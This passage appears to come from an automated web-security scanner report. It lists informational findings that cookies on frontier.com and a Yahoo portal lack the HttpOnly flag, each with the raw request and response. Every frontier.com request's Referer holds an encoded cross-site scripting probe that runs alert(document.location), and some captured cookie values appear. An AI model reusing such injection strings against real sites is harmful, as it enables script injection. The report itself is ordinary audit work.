The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Js/formHelpers.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8823CMWWU; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 7911
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Jul 2011 16:59:13 GMT
Accept-Ranges: bytes
ETag: "806da59fe46cc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:04 GMT

var screenX=0;
var screenY=0;
document.onmousedown=getMouseXY;


function getMouseXY(e){
   if(document.all) e=event;
   screenX=e.screenX;
   screenY=e.screenY;
}
function fixDecimal(fld){
   va
...[SNIP]...

10.58. http://frontier.com/Js/jQuery/jquery-1.4.4.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/jQuery/jquery-1.4.4.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Js/jQuery/jquery-1.4.4.min.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8826CMWWL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 78768
Content-Type: application/x-javascript
Last-Modified: Fri, 17 Jun 2011 17:54:21 GMT
Accept-Ranges: bytes
ETag: "804f195172dcc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:07 GMT

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

10.59. http://frontier.com/Js/jQuery/jquery.maskedinput.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/jQuery/jquery.maskedinput.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Js/jQuery/jquery.maskedinput.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8824CMWWW; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 3548
Content-Type: application/x-javascript
Last-Modified: Mon, 22 Nov 2010 19:43:08 GMT
Accept-Ranges: bytes
ETag: "0eed37c7d8acb1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:06 GMT

.../*
   Masked Input plugin for jQuery
   Copyright (c) 2007-2009 Josh Bush (digitalbush.com)
   Licensed under the MIT license (http://digitalbush.com/projects/masked-input-plugin/#license)
   Version:
...[SNIP]...

10.60. http://frontier.com/Js/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Js/s_code.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 29119
Content-Type: application/x-javascript
Last-Modified: Thu, 05 May 2011 05:01:12 GMT
Accept-Ranges: bytes
ETag: "8cabb274e1acc1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:53 GMT

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2011 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */

/* Specify the Report Suite ID(s) to track here */
//d
...[SNIP]...

10.61. http://frontier.com/Resources/3rdParty/HBX/hbx.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/HBX/hbx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/3rdParty/HBX/hbx.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8825CMWWK; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 16427
Content-Type: application/x-javascript
Last-Modified: Mon, 22 Nov 2010 21:06:52 GMT
Accept-Ranges: bytes
ETag: "07e5d2f898acb1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

//hbx.js,HBX2.5,Copyright 1997 - 2008. Omniture, Inc. All Rights Reserved. Omniture is a registered trademark of Omniture, Inc. in the United States, Canada, Japan, and the European Community.
/* IN
...[SNIP]...

10.62. http://frontier.com/Resources/3rdParty/JQuery/jq.client.plugin.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jq.client.plugin.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/3rdParty/JQuery/jq.client.plugin.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8826CMWWM; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 2858
Content-Type: application/x-javascript
Last-Modified: Mon, 28 Feb 2011 13:38:16 GMT
Accept-Ranges: bytes
ETag: "054a9c04cd7cb1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

(function() {
   
   var BrowserDetect = {
       init: function () {
           this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
           this.version = this.searchVersion(navigator.userAgen
...[SNIP]...

10.63. http://frontier.com/Resources/3rdParty/JQuery/jquery-1.4.2.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery-1.4.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/3rdParty/JQuery/jquery-1.4.2.min.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8825CMWWY; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 72328
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:07 GMT

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

10.64. http://frontier.com/Resources/3rdParty/JQuery/jquery-jtemplates.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery-jtemplates.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/3rdParty/JQuery/jquery-jtemplates.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8824CMWUL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 9709
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

/* jTemplates 0.7.8 (http://jtemplates.tpython.com) Copyright (c) 2009 Tomasz Gloc */
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.
...[SNIP]...

10.65. http://frontier.com/Resources/3rdParty/JQuery/jquery-ui.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery-ui.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/3rdParty/JQuery/jquery-ui.min.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8827CMWYI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 196163
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:08 GMT

/*!
* jQuery UI 1.8.5
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* http://docs.jqu
...[SNIP]...

10.66. http://frontier.com/Resources/3rdParty/JQuery/jquery.json-2.2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery.json-2.2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/3rdParty/JQuery/jquery.json-2.2.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8824CMWUL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 5769
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

/*
* jQuery JSON Plugin
* version: 2.1 (2009-08-14)
*
* This document is licensed as free software under the terms of the
* MIT License: http://www.opensource.org/licenses/mit-license.php

...[SNIP]...

10.67. http://frontier.com/images/FTRMain/frontier_Logo.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/FTRMain/frontier_Logo.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/FTRMain/frontier_Logo.jpg HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8827CMWYI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 4184
Content-Type: image/jpeg
Last-Modified: Mon, 25 Jul 2011 16:24:14 GMT
Accept-Ranges: bytes
ETag: "7023584be74acc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:09 GMT

[binary JPEG image body, 4184 bytes per Content-Length; not reproduced]
...[SNIP]...

10.68. http://frontier.com/images/FTRMain/gradientBox.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/FTRMain/gradientBox.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/FTRMain/gradientBox.png HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8827CMWWM; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 35375
Content-Type: image/png
Last-Modified: Thu, 12 May 2011 10:59:50 GMT
Accept-Ranges: bytes
ETag: "6227d5b69310cc1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:55 GMT

[binary PNG image body, 35375 bytes per Content-Length; not reproduced]
...[SNIP]...

10.69. http://frontier.com/images/FTRMain/small_arrow.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/FTRMain/small_arrow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/FTRMain/small_arrow.png HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8827CMWYI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 168
Content-Type: image/png
Last-Modified: Mon, 25 Jul 2011 16:24:14 GMT
Accept-Ranges: bytes
ETag: "24e85c4be74acc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:08 GMT

[binary PNG image body, 168 bytes per Content-Length; not reproduced]

10.70. http://frontier.com/images/icon_print.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/icon_print.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icon_print.gif HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8827CMWWO; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 107
Content-Type: image/gif
Last-Modified: Thu, 05 Apr 2007 14:26:24 GMT
Accept-Ranges: bytes
ETag: "603f7b638e77c71:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:53 GMT

[binary GIF image body, 107 bytes per Content-Length; not reproduced]

10.71. http://frontier.com/js/jquery/jquery.numeric.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /js/jquery/jquery.numeric.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery/jquery.numeric.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 3790
Content-Type: application/x-javascript
Last-Modified: Thu, 29 Jul 2010 19:17:28 GMT
Accept-Ranges: bytes
ETag: "094ffae522fcb1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:53 GMT

/*
*
* Copyright (c) 2006/2007 Sam Collett (http://www.texotela.co.uk)
* Licensed under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
*
* Version 1.0
* Demo: htt
...[SNIP]...

10.72. http://frontier.my.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVpMDhxY2Q3NXZjNGQiO3M6MjoibXQiO2k6MTMxNTMxMjE4Nzt9; expires=Fri, 06-Sep-2013 12:29:47 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:47 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MYFMP_Sacfea3=d=7142216504e66123b932767.54181906&s=6JRSdtjl3lb3w.8KyXWmOA--; expires=Mon, 05-Sep-2011 12:29:47 GMT; path=/; domain=frontier.my.yahoo.com; httponly
Set-Cookie: MYTMI=4; expires=Wed, 05-Sep-2012 12:29:47 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 171806

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="ua-wk ua-win">
<head>
<script>var gTop = Number(new Date());</script> <script> </s
...[SNIP]...

10.73. http://frontier.my.yahoo.com/e/js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /e/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /e/js?_action=show&_subAction=getThumbnail&ids=%5B%22id-482243%22%2C%22id-482610%22%5D&start=0&maxItems=6&test=&_id=a81b32&_tags=%5B%5D&_txnid=2&_crumb=O2TJF8Qm5TbVJKQVIyb0I.&_mode=json HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; myc=d=lgdbPCk32jI29Q_3alrTFdhUdvOS62KbYqbV15OhgNs5GX2tKBQbpx35R0zRmbc2LUGd9sm6Lxpmg9WFDPpxD__c009fz2GVX66td5mnZiW9ywKdpzLhUpvxPx0_YO8eLJoOmTCvIsU8dDnHSWUDxusuL9oofD8AewPqJHs645ckvFUSiZu58gMSalbacmvEfnPeELo1NplZ5H_oqzFeO8oDRo2YEgWvthq8q6VXUFZGvUFYTsX0Ch0O1C2lcf9XCCOjpDQMZJUMyxiaGSYFyQf7RTgcBtAylyd7gThn4Q1pX01g2Ad71BW5.EMxvBmfLZRYnVhVx2p9Hg3WuT.vWOvGVQqDsCX12VG21FoM&v=2; 